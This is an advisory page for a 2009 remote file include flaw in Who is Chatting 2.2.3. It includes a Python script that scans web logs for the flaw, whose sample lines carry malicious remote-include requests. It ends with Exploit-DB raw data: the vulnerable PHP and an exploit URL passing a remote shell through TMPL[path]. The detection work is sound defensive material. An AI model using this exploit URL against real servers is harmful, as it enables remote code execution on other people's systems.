Vendor: Who is Chatting
By: lumut--
CVSS: 9,3 (HIGH)
Type: Remote File Include
CWE: 98
Product Name: Who is Chatting
Affected Version From: 2.2.3
Affected Version To: 2.2.3
Patch Exists: Yes
Related CWE: N/A
CPE: a:familycms:who_is_chatting:2.2.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2009

Who is Chatting 2.2.3 Remote File Include Vulnerability

A vulnerability exists in Who is Chatting 2.2.3, which allows an attacker to include a remote file via the TMPL[path] parameter in the header.php file. This can be exploited to execute arbitrary PHP code by including a malicious PHP file from a remote location.

Mitigation:

Upgrade to the latest version of Who is Chatting 2.2.3 or apply the patch provided by the vendor.
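
A log check to run alongside the upgrade, as an added example that is not part of the original advisory or the vendor's code: it scans web server access logs for requests that set TMPL[path] on header.php. The Apache combined log format, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Constructed sample in Apache combined log format (not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [12/Mar/2009:10:01:22 +0000] "GET /mod_chatting/themes/default/header.php?TMPL[path]=http://files.example/x HTTP/1.1" 200 512 "-" "-"
192.0.2.11 - - [12/Mar/2009:10:02:05 +0000] "GET /mod_chatting/themes/default/header.php?TMPL%5Bpath%5D=ftp%3A%2F%2Ffiles.example%2Fx HTTP/1.1" 200 512 "-" "-"
192.0.2.12 - - [12/Mar/2009:10:03:40 +0000] "GET /mod_chatting/index.php?page=2 HTTP/1.1" 200 2048 "-" "-"
192.0.2.13 - - [12/Mar/2009:10:04:11 +0000] "GET /mod_chatting/themes/default/header.php HTTP/1.1" 200 128 "-" "-"
192.0.2.14 - - [12/Mar/2009:10:05:59 +0000] "POST /mod_chatting/themes/default/header.php?lang=en&TMPL[path]=themes/ HTTP/1.1" 200 128 "-" "-"
"""

# Client address, then the request target from the quoted request line.
LINE_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A value that starts with a URL scheme (http://, ftp://, ...).
SCHEME_RE = re.compile(r"^\s*[a-z][a-z0-9+.\-]*://", re.IGNORECASE)


def classify(request_target):
    """Return (verdict, value) for a request target, or None if unremarkable."""
    path, _, query = request_target.partition("?")
    if not unquote(path).endswith("/header.php"):
        return None
    # parse_qsl percent-decodes names and values, so TMPL%5Bpath%5D is caught too.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name.startswith("TMPL["):
            verdict = "remote-include" if SCHEME_RE.match(value) else "path-override"
            return verdict, value
    return None


def scan(log_text):
    """Return (client, verdict, value) for each line that sets TMPL[...] on header.php."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        hit = classify(m.group(2)) if m else None
        if hit:
            hits.append((m.group(1), *hit))
    return hits


if __name__ == "__main__":
    for client, verdict, value in scan(SAMPLE_LOG):
        print(f"{client}\t{verdict}\t{value}")
```

Access logs record only the request line, so a TMPL value sent in a POST body or cookie would not appear here.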

Exploit-DB raw data:

=======================================================
Who is Chatting 2.2.3 Remote File Include Vulnerability
=======================================================

# Author         : lumut--
# Script Details : http://www.familycms.com/downloads/details.php?file=50
# Bugs           :

<?
$chat_inc = $TMPL['path'] . "inc/chatting_inc.php";
include_once ($chat_inc);
?>

# Expl: http://server/mod_chatting/themes/default/header.php?TMPL[path]=[shell]

# Greetz & Thanks: cr4wl3r, team_elite, kisame, virusfree, doniskynet,
manadocoding